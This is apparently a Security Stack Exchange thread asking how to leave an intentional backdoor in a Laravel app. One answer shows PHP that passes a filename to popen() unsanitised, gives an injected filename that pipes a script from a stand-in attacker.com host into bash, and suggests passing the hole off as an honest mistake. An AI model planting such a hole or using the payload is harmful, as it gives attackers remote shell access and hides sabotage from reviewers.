-2

I'm pretty curious how someone could leave a backdoor in a Laravel application? In my opinion there isn't a way, because the entry point of the requests is a route file, and you have to write code for the route in order for there to be something to execute. Your team member will be able to track it down, and will tell you "Hey! What's that?".

Every request has an entry point and that entry point is a route in this case, Which will call a specific controller and its method. And there you have some logic that can be executable.

As we know that you have to follow some pretty clean rules for writing SQL queries, CSRF protection is already there. The common security vulnerabilities are well treated in the Laravel framework.

So what are the possible ways to leave a backdoor in a web application?

Anders
  • 64,406
  • 24
  • 178
  • 215
Comrade
  • 97
  • 1
  • 3
  • 4
    A backdoor can be disguised as an unintentional vulnerability. If you say framework X can't have a backdoor you're also saying the application can't possibly have any major vulnerabilities - which appears unlikely. – Arminius Apr 22 '17 at 18:28
  • Hope didn't missed the action, Anyway my point was that how you can leave a backdoor or some vulnerability which are sophisticated, means they are not easy to find. Frameworks tries to take care of common loopholes but the one an experienced programmer can leave will be different. – Comrade Apr 23 '17 at 10:33

2 Answers2

2

So what are the possible ways to leave a backdoor in a web application ?

Say, you have a URL to upload a document. Files are uploaded to this fairly innocuous URL:

https://example.com/upload.php?filename=blah.doc
# alternatively, filename could be in the request body, which makes no difference to the attack vector

You have a code that converts the uploaded document to html for preview in the browser:

$filename = $GET["filename"];
...
popen("doc2html " + $filename, "r");
# alternatively, using Symfony's Process class makes no difference to vulnerability

Seems innocuous, but unfortunately this code gives an attacker full shell access to your machine. The attacker can just upload a file named something like foo.doc || curl http://attacker.com/script.sh | bash, in other words uploading to https://example.com/upload.php?filename=foo.doc%20%7C%7C%20curl%20http%3A%2F%2Fattacker.com%2Fscript.sh%20%7C%20bash. And when popen()-ed, this filename will cause popen to download and execute script.sh.

If the bug is found, you can simply just say "oops, that was an honest mistake", you can plausibly deny that you intentionally inserted the backdoor.

Lie Ryan
  • 31,089
  • 6
  • 68
  • 93
-3

You don't leave a backdoor. Back-doors are left unintentionally. For example when you connect to your remote database without secure channels (ssl maybe) which is not encrypted you are leaving a vulnerability. Say someone taps into your communication or maybe just somehow gets your url (connection string) and alters/deletes your database which is vulnerable and you loose all your precious data, then it will be exploitation of your vulnerability or simply using a backdoor

Muhammad Khubaib Umer
  • 1
  • 2
  • 3
    A backdoor is not "left unintentionally", it's built on purpose. – Arminius Apr 22 '17 at 22:41
  • Both the answer and @Arminius reply are not completely correct. A backdoor can be intentionally placed in a system by a malicious actor, or it can be an unintended consequence of a bug. – 0xSheepdog Apr 22 '17 at 23:24
  • 4
    @0xSheepdog IMO, calling an unintentional bug a backdoor is misleading. – Arminius Apr 22 '17 at 23:34
  • 1
    It's all a matter of semantics. "Backdoor" isn't exactly a technical term with a consistently applied and documented definition. That is why these sorts of answers are not usually well received. – 0xSheepdog Apr 23 '17 at 03:09
  • Guys that's not the point of it. The point is how can you leave an intentional backdoor ? What are your experiences ? – Comrade Apr 23 '17 at 10:35